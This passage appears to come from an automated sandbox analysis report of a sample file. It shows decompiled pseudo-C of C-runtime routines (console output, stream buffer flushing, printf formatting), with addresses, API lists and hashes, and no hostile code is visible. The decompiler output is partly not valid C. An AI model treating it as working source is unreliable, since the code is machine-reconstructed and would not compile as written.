                            						_t14 = 0xffff;
                            					}
                            				}
                            				return E00416CA0(_t14, _t25, _v16 ^ _t35, _t31, _t33, _t34);
                            			}














                            0x00419050
                            0x00419058
                            0x0041905f
                            0x00419069
                            0x004190de
                            0x004190e5
                            0x00419138
                            0x00419138
                            0x004190e7
                            0x00419106
                            0x00419110
                            0x00419131
                            0x00419131
                            0x00419112
                            0x00419120
                            0x0041912f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0041912f
                            0x00419110
                            0x0041906b
                            0x00419072
                            0x00419074
                            0x00419074
                            0x00419080
                            0x0041909a
                            0x004190a9
                            0x004190d4
                            0x00000000
                            0x004190ab
                            0x004190b2
                            0x004190cb
                            0x004190bf
                            0x004190bf
                            0x00000000
                            0x004190d2
                            0x004190b2
                            0x00419082
                            0x00419082
                            0x00419082
                            0x00419080
                            0x00419149

                            APIs
                            • ___initconout.LIBCMTD ref: 00419074
                              • Part of subcall function 0041F0F0: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,?,00419079), ref: 0041F109
                            • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 004190F9
                            • WideCharToMultiByte.KERNEL32(00000000), ref: 00419100
                            • WriteConsoleA.KERNEL32(FFFFFFFE,00000000,?,?,00000000), ref: 00419127
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
                            • String ID:
                            • API String ID: 3432720595-0
                            • Opcode ID: 851ed247e91a578dd88bf636fdb2013bc44709bcbd625bc1d4c6775f3f848574
                            • Instruction ID: bd71257c68542f1951d572b2ea078935f3f984140fb731142d712e4977d820f9
                            • Opcode Fuzzy Hash: 851ed247e91a578dd88bf636fdb2013bc44709bcbd625bc1d4c6775f3f848574
                            • Instruction Fuzzy Hash: D321D330540205EFDB20DF54DD58BEB37B5EB08320F60A26AE501962E0D7785EC5CF6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 61%
                            			E00424873() {
                            				signed int _t104;
                            				void* _t119;
                            				void* _t122;
                            				void* _t130;
                            				signed int _t179;
                            				void* _t193;
                            				void* _t194;
                            				void* _t195;
                            				void* _t197;
                            
                            				if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000001) == 0) {
                            					L5:
                            					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000002;
                            					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0xffffffef;
                            					 *( *((intOrPtr*)(_t195 - 8)) + 4) = 0;
                            					 *(_t195 - 4) = 0;
                            					_t136 =  *(_t195 - 4);
                            					 *(_t195 - 0xc) =  *(_t195 - 4);
                            					if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x0000010c) != 0) {
                            						L10:
                            						if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000108) == 0) {
                            							 *(_t195 - 4) = 2;
                            							 *((short*)(_t195 - 0x14)) =  *(_t195 + 8) & 0x0000ffff;
                            							 *(_t195 - 0xc) = E0040ECD0( *(_t195 - 0x10),  *(_t195 - 0x10), _t195 - 0x14,  *(_t195 - 4));
                            							L25:
                            							if( *(_t195 - 0xc) ==  *(_t195 - 4)) {
                            								_t104 =  *(_t195 + 8) & 0x0000ffff;
                            							} else {
                            								 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
                            								_t104 = 0xffff;
                            							}
                            							goto L28;
                            						}
                            						if( *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) -  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)) < 0) {
                            							_push(L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
                            							_push(0);
                            							_push(0xa0);
                            							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\_flsbuf.c");
                            							_push(2);
                            							_t119 = L0040E1A0();
                            							_t197 = _t197 + 0x14;
                            							if(_t119 == 1) {
                            								asm("int3");
                            							}
                            						}
                            						 *(_t195 - 4) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) -  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8));
                            						 *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)) + 2;
                            						 *( *((intOrPtr*)(_t195 - 8)) + 4) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 0x18)) - 2;
                            						if( *(_t195 - 4) <= 0) {
                            							if( *(_t195 - 0x10) == 0xffffffff ||  *(_t195 - 0x10) == 0xfffffffe) {
                            								 *((intOrPtr*)(_t195 - 0x18)) = 0x60ac60;
                            							} else {
                            								 *((intOrPtr*)(_t195 - 0x18)) = (( *(_t195 - 0x10) & 0x0000001f) << 6) +  *((intOrPtr*)(0x633440 + ( *(_t195 - 0x10) >> 5) * 4));
                            							}
                            							_t68 =  *((intOrPtr*)(_t195 - 0x18)) + 4; // 0xa80
                            							_t152 =  *_t68 & 0x00000020;
                            							if(( *_t68 & 0x00000020) == 0) {
                            								goto L23;
                            							} else {
                            								_t179 =  *(_t195 - 0x10);
                            								 *(_t195 - 0x20) = E004194E0(_t152, _t179, _t179, 0, 0, 2);
                            								 *(_t195 - 0x1c) = _t179;
                            								if(( *(_t195 - 0x20) &  *(_t195 - 0x1c)) != 0xffffffff) {
                            									goto L23;
                            								}
                            								 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
                            								_t104 = 0xffff;
                            								goto L28;
                            							}
                            						} else {
                            							 *(_t195 - 0xc) = E0040ECD0( *((intOrPtr*)(_t195 - 8)),  *(_t195 - 0x10),  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)),  *(_t195 - 4));
                            							L23:
                            							 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8)))) =  *(_t195 + 8) & 0x0000ffff;
                            							goto L25;
                            						}
                            					}
                            					if( *((intOrPtr*)(_t195 - 8)) == E004109D0() + 0x20 ||  *((intOrPtr*)(_t195 - 8)) == E004109D0() + 0x40) {
                            						_t136 =  *(_t195 - 0x10);
                            						_t122 = E00419400(_t130,  *(_t195 - 0x10), _t193, _t194,  *(_t195 - 0x10));
                            						_t197 = _t197 + 4;
                            						if(_t122 != 0) {
                            							goto L10;
                            						}
                            						goto L9;
                            					} else {
                            						L9:
                            						E00419E10(_t136,  *((intOrPtr*)(_t195 - 8)));
                            						_t197 = _t197 + 4;
                            						goto L10;
                            					}
                            				} else {
                            					 *( *((intOrPtr*)(_t195 - 8)) + 4) = 0;
                            					if(( *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0x00000010) == 0) {
                            						 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) | 0x00000020;
                            						_t104 = 0xffff;
                            						L28:
                            						return _t104;
                            					}
                            					 *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)))) =  *((intOrPtr*)( *((intOrPtr*)(_t195 - 8)) + 8));
                            					 *( *((intOrPtr*)(_t195 - 8)) + 0xc) =  *( *((intOrPtr*)(_t195 - 8)) + 0xc) & 0xfffffffe;
                            					goto L5;
                            				}
                            			}












                            0x004248ad
                            0x004248f9
                            0x00424905
                            0x00424914
                            0x0042491a
                            0x00424921
                            0x00424928
                            0x0042492b
                            0x00424939
                            0x00424971
                            0x0042497d
                            0x00424a85
                            0x00424a95
                            0x00424aad
                            0x00424ab0
                            0x00424ab6
                            0x00424ad1
                            0x00424ab8
                            0x00424ac4
                            0x00424ac7
                            0x00424ac7
                            0x00000000
                            0x00424ab6
                            0x0042498e
                            0x00424990
                            0x00424995
                            0x00424997
                            0x0042499c
                            0x004249a1
                            0x004249a3
                            0x004249a8
                            0x004249ae
                            0x004249b0
                            0x004249b0
                            0x004249ae
                            0x004249bc
                            0x004249cb
                            0x004249d9
                            0x004249e0
                            0x00424a02
                            0x00424a25
                            0x00424a0a
                            0x00424a20
                            0x00424a20
                            0x00424a2f
                            0x00424a33
                            0x00424a36
                            0x00000000
                            0x00424a38
                            0x00424a3e
                            0x00424a4a
                            0x00424a4d
                            0x00424a59
                            0x00000000
                            0x00000000
                            0x00424a67
                            0x00424a6a
                            0x00000000
                            0x00424a6a
                            0x004249e2
                            0x004249f9
                            0x00424a71
                            0x00424a80
                            0x00000000
                            0x00424a80
                            0x004249e0
                            0x00424946
                            0x00424955
                            0x00424959
                            0x0042495e
                            0x00424963
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00424965
                            0x00424965
                            0x00424969
                            0x0042496e
                            0x00000000
                            0x0042496e
                            0x004248af
                            0x004248b2
                            0x004248c2
                            0x004248ec
                            0x004248ef
                            0x00424ad6
                            0x00424ad9
                            0x00424ad9
                            0x004248cd
                            0x004248db
                            0x00000000
                            0x004248db

                            APIs
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 0042499C
                            • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 00424990
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __getbuf__isatty__write
                            • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
                            • API String ID: 2861569966-4070537404
                            • Opcode ID: 143be117e55a2cb583e1dfc100ce3569d1373143b1c53e0d2d26c7bc60b7eb62
                            • Instruction ID: 3771cb71ff4f9f648e5b3ba1356e89e07134316de85d5563c5280ee8c7fd95ba
                            • Opcode Fuzzy Hash: 143be117e55a2cb583e1dfc100ce3569d1373143b1c53e0d2d26c7bc60b7eb62
                            • Instruction Fuzzy Hash: AD51E978B10218EFDB14CF98D491AAEFBB1FF88324F148299E4456B395D634EA81CF44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E00410F01() {
                            				signed int _t102;
                            				signed int _t104;
                            				signed int _t114;
                            				void* _t118;
                            				void* _t121;
                            				signed int _t126;
                            				void* _t129;
                            				signed int _t174;
                            				void* _t188;
                            				void* _t189;
                            				void* _t190;
                            				void* _t192;
                            
                            				if(( *( *(_t190 - 8) + 0xc) & 0x00000001) == 0) {
                            					L5:
                            					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) | 0x00000002;
                            					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) & 0xffffffef;
                            					 *( *(_t190 - 8) + 4) = 0;
                            					 *(_t190 - 4) = 0;
                            					_t135 =  *(_t190 - 4);
                            					 *(_t190 - 0xc) =  *(_t190 - 4);
                            					if(( *( *(_t190 - 8) + 0xc) & 0x0000010c) != 0) {
                            						L10:
                            						if(( *( *(_t190 - 8) + 0xc) & 0x00000108) == 0) {
                            							 *(_t190 - 4) = 1;
                            							 *(_t190 - 0xc) = E0040ECD0( *(_t190 - 4),  *(_t190 - 0x10), _t190 + 8,  *(_t190 - 4));
                            							L25:
                            							if( *(_t190 - 0xc) ==  *(_t190 - 4)) {
                            								_t102 =  *(_t190 + 8) & 0x000000ff;
                            							} else {
                            								_t104 =  *( *(_t190 - 8) + 0xc) | 0x00000020;
                            								 *( *(_t190 - 8) + 0xc) = _t104;
                            								_t102 = _t104 | 0xffffffff;
                            							}
                            							goto L28;
                            						}
                            						if( *( *(_t190 - 8)) -  *((intOrPtr*)( *(_t190 - 8) + 8)) < 0) {
                            							_push(L"(\"inconsistent IOB fields\", stream->_ptr - stream->_base >= 0)");
                            							_push(0);
                            							_push(0xa0);
                            							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\_flsbuf.c");
                            							_push(2);
                            							_t118 = L0040E1A0();
                            							_t192 = _t192 + 0x14;
                            							if(_t118 == 1) {
                            								asm("int3");
                            							}
                            						}
                            						 *(_t190 - 4) =  *( *(_t190 - 8)) -  *((intOrPtr*)( *(_t190 - 8) + 8));
                            						 *( *(_t190 - 8)) =  *((intOrPtr*)( *(_t190 - 8) + 8)) + 1;
                            						 *( *(_t190 - 8) + 4) =  *((intOrPtr*)( *(_t190 - 8) + 0x18)) - 1;
                            						if( *(_t190 - 4) <= 0) {
                            							if( *(_t190 - 0x10) == 0xffffffff ||  *(_t190 - 0x10) == 0xfffffffe) {
                            								 *((intOrPtr*)(_t190 - 0x14)) = 0x60ac60;
                            							} else {
                            								 *((intOrPtr*)(_t190 - 0x14)) = (( *(_t190 - 0x10) & 0x0000001f) << 6) +  *((intOrPtr*)(0x633440 + ( *(_t190 - 0x10) >> 5) * 4));
                            							}
                            							_t68 =  *((intOrPtr*)(_t190 - 0x14)) + 4; // 0xa80
                            							_t149 =  *_t68 & 0x00000020;
                            							if(( *_t68 & 0x00000020) == 0) {
                            								goto L23;
                            							} else {
                            								_t174 =  *(_t190 - 0x10);
                            								 *(_t190 - 0x1c) = E004194E0(_t149, _t174, _t174, 0, 0, 2);
                            								 *(_t190 - 0x18) = _t174;
                            								if(( *(_t190 - 0x1c) &  *(_t190 - 0x18)) != 0xffffffff) {
                            									goto L23;
                            								}
                            								_t114 =  *(_t190 - 8);
                            								 *(_t114 + 0xc) =  *( *(_t190 - 8) + 0xc) | 0x00000020;
                            								_t102 = _t114 | 0xffffffff;
                            								goto L28;
                            							}
                            						} else {
                            							 *(_t190 - 0xc) = E0040ECD0( *(_t190 - 8),  *(_t190 - 0x10),  *((intOrPtr*)( *(_t190 - 8) + 8)),  *(_t190 - 4));
                            							L23:
                            							 *((char*)( *((intOrPtr*)( *(_t190 - 8) + 8)))) =  *(_t190 + 8);
                            							goto L25;
                            						}
                            					}
                            					if( *(_t190 - 8) == E004109D0() + 0x20 ||  *(_t190 - 8) == E004109D0() + 0x40) {
                            						_t135 =  *(_t190 - 0x10);
                            						_t121 = E00419400(_t129,  *(_t190 - 0x10), _t188, _t189,  *(_t190 - 0x10));
                            						_t192 = _t192 + 4;
                            						if(_t121 != 0) {
                            							goto L10;
                            						}
                            						goto L9;
                            					} else {
                            						L9:
                            						E00419E10(_t135,  *(_t190 - 8));
                            						_t192 = _t192 + 4;
                            						goto L10;
                            					}
                            				} else {
                            					 *( *(_t190 - 8) + 4) = 0;
                            					if(( *( *(_t190 - 8) + 0xc) & 0x00000010) == 0) {
                            						_t126 =  *(_t190 - 8);
                            						 *( *(_t190 - 8) + 0xc) =  *(_t126 + 0xc) | 0x00000020;
                            						_t102 = _t126 | 0xffffffff;
                            						L28:
                            						return _t102;
                            					}
                            					 *( *(_t190 - 8)) =  *((intOrPtr*)( *(_t190 - 8) + 8));
                            					 *( *(_t190 - 8) + 0xc) =  *( *(_t190 - 8) + 0xc) & 0xfffffffe;
                            					goto L5;
                            				}
                            			}















                            0x00410f39
                            0x00410f83
                            0x00410f8f
                            0x00410f9e
                            0x00410fa4
                            0x00410fab
                            0x00410fb2
                            0x00410fb5
                            0x00410fc3
                            0x00410ffb
                            0x00411007
                            0x00411106
                            0x00411121
                            0x00411124
                            0x0041112a
                            0x00411143
                            0x0041112c
                            0x00411132
                            0x00411138
                            0x0041113b
                            0x0041113b
                            0x00000000
                            0x0041112a
                            0x00411018
                            0x0041101a
                            0x0041101f
                            0x00411021
                            0x00411026
                            0x0041102b
                            0x0041102d
                            0x00411032
                            0x00411038
                            0x0041103a
                            0x0041103a
                            0x00411038
                            0x00411046
                            0x00411055
                            0x00411063
                            0x0041106a
                            0x0041108c
                            0x004110af
                            0x00411094
                            0x004110aa
                            0x004110aa
                            0x004110b9
                            0x004110bd
                            0x004110c0
                            0x00000000
                            0x004110c2
                            0x004110c8
                            0x004110d4
                            0x004110d7
                            0x004110e3
                            0x00000000
                            0x00000000
                            0x004110ee
                            0x004110f1
                            0x004110f4
                            0x00000000
                            0x004110f4
                            0x0041106c
                            0x00411083
                            0x004110f9
                            0x00411102
                            0x00000000
                            0x00411102
                            0x0041106a
                            0x00410fd0
                            0x00410fdf
                            0x00410fe3
                            0x00410fe8
                            0x00410fed
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00410fef
                            0x00410fef
                            0x00410ff3
                            0x00410ff8
                            0x00000000
                            0x00410ff8
                            0x00410f3b
                            0x00410f3e
                            0x00410f4e
                            0x00410f6c
                            0x00410f78
                            0x00410f7b
                            0x00411148
                            0x0041114b
                            0x0041114b
                            0x00410f59
                            0x00410f67
                            0x00000000
                            0x00410f67

                            APIs
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c, xrefs: 00411026
                            • ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0), xrefs: 0041101A
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __getbuf__isatty__write
                            • String ID: ("inconsistent IOB fields", stream->_ptr - stream->_base >= 0)$f:\dd\vctools\crt_bld\self_x86\crt\src\_flsbuf.c
                            • API String ID: 2861569966-4070537404
                            • Opcode ID: d52142aec03c6b3a91e03f9bd270b10fb2d10dbcbe227ccb2e527b98531a6110
                            • Instruction ID: 2c130a109d115f38042a12a2f461c5b9ce17d0b30de7be35641cc070e499371d
                            • Opcode Fuzzy Hash: d52142aec03c6b3a91e03f9bd270b10fb2d10dbcbe227ccb2e527b98531a6110
                            • Instruction Fuzzy Hash: 0E51D975A00208AFDB14CF94C491AADFB71EF88324F14829AE5456B396D675EAC2CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E00422014(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                            				signed int _t499;
                            				void* _t504;
                            				signed int _t506;
                            				void* _t526;
                            				intOrPtr _t528;
                            				signed int _t536;
                            				intOrPtr _t555;
                            				intOrPtr _t556;
                            				signed int _t557;
                            				void* _t559;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t556 = __esi;
                            					_t555 = __edi;
                            					_t528 = __ebx;
                            					 *(_t557 - 0x30) = 8;
                            					while(1) {
                            						L146:
                            						 *(__ebp - 0x260) = 7;
                            						while(1) {
                            							L148:
                            							 *(__ebp - 8) = 0x10;
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            							__eflags =  *(__ebp - 0x10) & 0x00000080;
                            							if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            								 *(__ebp - 0x14) = 0x30;
                            								 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
                            								__eflags =  *(__ebp - 0x260) + 0x51;
                            								 *((char*)(__ebp - 0x13)) = __al;
                            								 *(__ebp - 0x1c) = 2;
                            							}
                            							while(1) {
                            								L153:
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            								__eflags =  *(__ebp - 0x10) & 0x00008000;
                            								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            									__eflags =  *(__ebp - 0x10) & 0x00001000;
                            									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            										__eflags =  *(__ebp - 0x10) & 0x00000020;
                            										if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            											__eflags =  *(__ebp - 0x10) & 0x00000040;
                            											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            												__ecx = __ebp + 0x14;
                            												__eax = E0041C290(__ebp + 0x14);
                            												__edx = 0;
                            												__eflags = 0;
                            												 *(__ebp - 0x2b8) = __eax;
                            												 *(__ebp - 0x2b4) = 0;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												__eax = E0041C290(__ebp + 0x14);
                            												asm("cdq");
                            												 *(__ebp - 0x2b8) = __eax;
                            												 *(__ebp - 0x2b4) = __edx;
                            											}
                            										} else {
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            											__eflags =  *(__ebp - 0x10) & 0x00000040;
                            											if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            												__ecx = __ebp + 0x14;
                            												E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            												asm("cdq");
                            												 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            												 *(__ebp - 0x2b4) = __edx;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												__eax = E0041C290(__ebp + 0x14);
                            												__ax = __eax;
                            												asm("cdq");
                            												 *(__ebp - 0x2b8) = __eax;
                            												 *(__ebp - 0x2b4) = __edx;
                            											}
                            										}
                            									} else {
                            										__eax = __ebp + 0x14;
                            										 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            										 *(__ebp - 0x2b4) = __edx;
                            									}
                            								} else {
                            									__ecx = __ebp + 0x14;
                            									 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            									 *(__ebp - 0x2b4) = __edx;
                            								}
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            								__eflags =  *(__ebp - 0x10) & 0x00000040;
                            								if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            									goto L170;
                            								}
                            								L166:
                            								__eflags =  *(__ebp - 0x2b4);
                            								if(__eflags > 0) {
                            									goto L170;
                            								}
                            								L167:
                            								if(__eflags < 0) {
                            									L169:
                            									 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
                            									__edx =  *(__ebp - 0x2b4);
                            									asm("adc edx, 0x0");
                            									__edx =  ~( *(__ebp - 0x2b4));
                            									 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
                            									 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            									L171:
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            									__eflags =  *(__ebp - 0x10) & 0x00008000;
                            									if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            										__eflags =  *(__ebp - 0x10) & 0x00001000;
                            										if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            											__edx =  *(__ebp - 0x2c0);
                            											__eax =  *(__ebp - 0x2bc);
                            											__eax =  *(__ebp - 0x2bc) & 0x00000000;
                            											__eflags = __eax;
                            											 *(__ebp - 0x2bc) = __eax;
                            										}
                            									}
                            									__eflags =  *(__ebp - 0x30);
                            									if( *(__ebp - 0x30) >= 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            										__eflags =  *(__ebp - 0x30) - 0x200;
                            										if( *(__ebp - 0x30) > 0x200) {
                            											 *(__ebp - 0x30) = 0x200;
                            										}
                            									} else {
                            										 *(__ebp - 0x30) = 1;
                            									}
                            									 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            									__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            									if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            										 *(__ebp - 0x1c) = 0;
                            									}
                            									__eax = __ebp - 0x49;
                            									 *(__ebp - 4) = __ebp - 0x49;
                            									while(1) {
                            										L181:
                            										__ecx =  *(__ebp - 0x30);
                            										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            										 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            										__eflags =  *(__ebp - 0x30);
                            										if( *(__ebp - 0x30) > 0) {
                            											goto L183;
                            										}
                            										L182:
                            										 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            										__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            										if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            											L186:
                            											__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
                            											 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
                            											__ecx =  *(__ebp - 4);
                            											__ecx =  *(__ebp - 4) + 1;
                            											 *(__ebp - 4) = __ecx;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            											__eflags =  *(__ebp - 0x10) & 0x00000200;
                            											if(( *(__ebp - 0x10) & 0x00000200) == 0) {
                            												while(1) {
                            													L190:
                            													__eflags =  *(__ebp - 0x28);
                            													if( *(__ebp - 0x28) != 0) {
                            														goto L216;
                            													}
                            													L191:
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            													__eflags =  *(__ebp - 0x10) & 0x00000040;
                            													if(( *(__ebp - 0x10) & 0x00000040) != 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
                            														__eflags =  *(__ebp - 0x10) & 0x00000100;
                            														if(( *(__ebp - 0x10) & 0x00000100) == 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
                            															__eflags =  *(__ebp - 0x10) & 0x00000001;
                            															if(( *(__ebp - 0x10) & 0x00000001) == 0) {
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
                            																__eflags =  *(__ebp - 0x10) & 0x00000002;
                            																if(( *(__ebp - 0x10) & 0x00000002) != 0) {
                            																	 *(__ebp - 0x14) = 0x20;
                            																	 *(__ebp - 0x1c) = 1;
                            																}
                            															} else {
                            																 *(__ebp - 0x14) = 0x2b;
                            																 *(__ebp - 0x1c) = 1;
                            															}
                            														} else {
                            															 *(__ebp - 0x14) = 0x2d;
                            															 *(__ebp - 0x1c) = 1;
                            														}
                            													}
                            													 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
                            													__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            													 *(__ebp - 0x2c4) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
                            													__eflags =  *(__ebp - 0x10) & 0x0000000c;
                            													if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
                            														__edx = __ebp - 0x24c;
                            														__eax =  *(__ebp + 8);
                            														__ecx =  *(__ebp - 0x2c4);
                            														__eax = E00422790(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
                            													}
                            													__edx = __ebp - 0x24c;
                            													__eax =  *(__ebp + 8);
                            													__ecx =  *(__ebp - 0x1c);
                            													__edx = __ebp - 0x14;
                            													E004227D0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x24c) =  *(__ebp - 0x10);
                            													__eax =  *(__ebp - 0x10) & 0x00000008;
                            													__eflags =  *(__ebp - 0x10) & 0x00000008;
                            													if(( *(__ebp - 0x10) & 0x00000008) != 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            														__eflags =  *(__ebp - 0x10) & 0x00000004;
                            														if(( *(__ebp - 0x10) & 0x00000004) == 0) {
